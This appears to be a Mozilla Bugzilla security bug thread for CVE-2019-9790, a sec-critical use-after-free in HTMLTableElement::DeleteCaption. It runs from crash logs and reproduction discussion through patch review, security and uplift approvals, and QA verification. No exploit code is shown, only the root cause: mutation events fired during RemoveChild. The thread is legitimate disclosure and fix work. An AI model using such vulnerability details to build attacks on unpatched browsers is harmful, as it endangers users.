--DOMWINDOW == 28 (0x616000267380) [pid = 32513] [serial = 32] [outer = (nil)] [url = chrome://devtools/content/webconsole/index.html]
--DOMWINDOW == 27 (0x616000035180) [pid = 32513] [serial = 29] [outer = (nil)] [url = about:blank]
--DOMWINDOW == 26 (0x6190009ffb80) [pid = 32513] [serial = 27] [outer = (nil)] [url = about:tabcrashed?e=tabcrashed&u=http%3A//127.0.0.1%3A8080/crash.html&c=UTF-8&f=regular&d=%20]
--DOMWINDOW == 25 (0x61900084a880) [pid = 32513] [serial = 38] [outer = (nil)] [url = about:blank]
--DOMWINDOW == 24 (0x6190007bc580) [pid = 32513] [serial = 34] [outer = (nil)] [url = about:blank]
--DOMWINDOW == 23 (0x619000137980) [pid = 32513] [serial = 30] [outer = (nil)] [url = about:blank]
--DOMWINDOW == 22 (0x6190001f5e80) [pid = 32513] [serial = 31] [outer = (nil)] [url = about:devtools-toolbox]
--DOMWINDOW == 21 (0x619001205c80) [pid = 32513] [serial = 33] [outer = (nil)] [url = about:blank]
[Parent 32513, Main Thread] WARNING: Found a principal with no URI, assuming third-party request: file /builds/worker/workspace/build/src/dom/base/ThirdPartyUtil.cpp, line 226
[Parent 32513, Main Thread] WARNING: 'NS_FAILED(rv)', file /builds/worker/workspace/build/src/netwerk/url-classifier/UrlClassifierCommon.cpp, line 122
[Parent 32513, Main Thread] WARNING: Found a principal with no URI, assuming third-party request: file /builds/worker/workspace/build/src/dom/base/ThirdPartyUtil.cpp, line 226
[Parent 32513, Main Thread] WARNING: 'NS_FAILED(rv)', file /builds/worker/workspace/build/src/netwerk/url-classifier/UrlClassifierCommon.cpp, line 122
[Parent 32513, Main Thread] WARNING: 'NS_FAILED(rv)', file /builds/worker/workspace/build/src/netwerk/url-classifier/UrlClassifierCommon.cpp, line 122

It seems like I'm not removing the caption in time for it to crash. I wonder why? Based upon the code it does look like it should be a Use After Free but in practice it's just failing on the assertion.

Flags: needinfo?(wieser.brandon)

Generally, you should use a non-debug ASan build to demonstrate a UAF, though of course seeing what asserts get hit in a debug build is also useful to diagnose the issue.

Keywords: csectype-uaf, sec-critical
Summary: Use After Free In HTMLTableElment::DeleteCaption Crashing Proof of Concept Included → Use After Free In HTMLTableElment::DeleteCaption

For what it is worth, I was able to reproduce the assertion using the test case in comment 7 in a debug ASan build, but nothing happened in a non-debug ASan build.

Debug build asserts too. The assertion is wrong there.

Priority: -- → P1

Yeah, I'm getting only that somewhat harmless assertion with asan-debug too.

So this patch is based on code inspection. nsINode::RemoveChild may dispatch DOMNodeRemoved, and anything can happen at that time, so arguments should be kept alive.
Feel free to prove me wrong :)

I think IgnoredErrorResult is fine here, since it thrown if the node is already removed.

Attachment #9041604 - Flags: review?(peterv)
Attachment #9041604 - Flags: review?(peterv) → review+

Comment on attachment 9041604 [details] [diff] [review]
table_crashes.diff

Security Approval Request

How easily could an exploit be constructed based on the patch?

The changes do pinpoint the issue. (The testcases in this bug seem to just trigger somewhat harmless assertion)

Commit message could be
-m " Bug 1525145, remove harmless assertions by using IgnoredErrorResult, r=peterv"

Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?

No

Which older supported branches are affected by this flaw?

all

If not all supported branches, which bug introduced the flaw?

None

Do you have backports for the affected branches?

Yes

If not, how different, hard to create, and risky will they be?

How likely is this patch to cause regressions; how much testing does it need?

Very unlikely to cause regressions. Just keeping objects a tiny bit longer alive in an edge case.

Attachment #9041604 - Flags: sec-approval?
Comment on attachment 9041604 [details] [diff] [review] table_crashes.diff sec-approval+ for trunk. We'll want a beta and ESR60 patch.
Attachment #9041604 - Flags: sec-approval? → sec-approval+

The patch should apply to beta and esr60 too.

Hmm, perhaps I misinterpret "### Do you have backports for the affected branches?"
in a wrong way? I thought if I say yes, it means the patches uploaded to the bug are enough to cover the branches too.

Comment on attachment 9041604 [details] [diff] [review]
table_crashes.diff

Beta/Release Uplift Approval Request

Feature/Bug causing the regression

None

User impact if declined

possible crashes

Is this code covered by automated tests?

No

Has the fix been verified in Nightly?

No

Needs manual test from QE?

No

If yes, steps to reproduce

List of other uplifts needed

None

Risk to taking this patch

Low

Why is the change risky/not risky? (and alternatives if risky)

Basically adding a kungfuDeathGrip

String changes made/needed

NA

Attachment #9041604 - Flags: approval-mozilla-esr60?
Attachment #9041604 - Flags: approval-mozilla-beta?

Is this still waiting to land on mozilla-central?

Flags: needinfo?(bugs)

https://hg.mozilla.org/mozilla-central/rev/3dd87564278e

Group: dom-core-security → core-security-release
Status: UNCONFIRMED → RESOLVED
Closed: 6 years ago
status-firefox67: affectedfixed
Resolution: --- → FIXED
Target Milestone: --- → mozilla67
Comment on attachment 9041604 [details] [diff] [review] table_crashes.diff sec-critical uaf fix, approved for 66.0b9
Attachment #9041604 - Flags: approval-mozilla-beta? → approval-mozilla-beta+
Flags: needinfo?(bugs)
Flags: sec-bounty? → sec-bounty+
Flags: qe-verify+
Whiteboard: [reporter-external] [client-bounty-form] [verif?] → [reporter-external] [client-bounty-form] [verif?][post-critsmash-triage]]
Whiteboard: [reporter-external] [client-bounty-form] [verif?][post-critsmash-triage]] → [reporter-external] [client-bounty-form] [verif?][post-critsmash-triage]][qa-triaged]

Hello ,

I have managed to reproduce this issue with 67.0a1(20190204214259)asan debug build from 2019-02-04 on Ubuntu 16.04x64.

Confirming this issue as verified fixed on 66.0b10(20190221023827) and 67.0a1(20190221102221) with Ubuntu 16.04x64.

Status: RESOLVED → VERIFIED
status-firefox66: fixedverified
status-firefox67: fixedverified
Flags: qe-verify+
Comment on attachment 9041604 [details] [diff] [review] table_crashes.diff Sec-crit fix verified by QA. Approved for 60.6esr.
Attachment #9041604 - Flags: approval-mozilla-esr60? → approval-mozilla-esr60+
QA Whiteboard: [qa-triaged]
Whiteboard: [reporter-external] [client-bounty-form] [verif?][post-critsmash-triage]][qa-triaged] → [reporter-external] [client-bounty-form] [verif?][post-critsmash-triage]

Confirming this issue as verified fixed with 60.6.0esr(20190313091946) on Ubuntu 16.04x64.

status-firefox-esr60: fixedverified
Whiteboard: [reporter-external] [client-bounty-form] [verif?][post-critsmash-triage] → [reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][adv-main66+][adv-esr60.6+]
Alias: CVE-2019-9790
Group: core-security-release
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: